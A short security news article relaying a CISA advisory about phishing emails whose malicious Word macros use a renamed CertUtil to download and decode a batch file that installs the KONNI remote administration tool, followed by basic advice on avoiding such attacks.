The Cybersecurity and Infrastructure Security Agency
(CISA) advised users to be wary of an email attachment containing a malicious Microsoft
Word document that’s used to deploy KONNI malware.
Phishing is one of the main methods hackers use to spread
malware, and there’s a solid reason for that. It doesn’t require technical
expertise to infiltrate networks or to compromise security systems. Careless or
untrained employees will do the work of hackers when they open an email without
double-checking where it comes from.
Phishing emails usually try to trick users into visiting a
website that looks very much like the official one, so they can steal their
credentials. In some cases, the simple act of visiting a website can compromise
a device or PC, if it’s vulnerable. Phishing emails also carry infected attachments,
and Word documents are among the most common.
Microsoft Word features Macro automatization functions
that have legitimate uses, but bad actors can use them to run commands and
install further payloads, all invisible to the users.
“Once the Visual Basic Application (VBA) macro constructs
the command line, it uses the certificate database tool CertUtil to download
remote files from a given Uniform Resource Locator” says CISA in the advisory.
“It also incorporates a built-in function to decode base64-encoded files. The
Command Prompt silently copies certutil.exe into a temp directory and renames
it to evade detection.”
“The cyber actor then downloads a text file from a remote
resource containing a base64-encoded string that is decoded by CertUtil and
saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file
from the temp directory and executes the .BAT file.”
The result is the final installation of KONNI, a remote
administration tool that hackers use to steal files, infect other hosts in the
same network, take screenshots, capture keystrokes and more.
The best way to protect against this type of attack is to
have a security solution installed and up to date, to never open attachments
from unknown sources and to keep the Macro function disabled by default.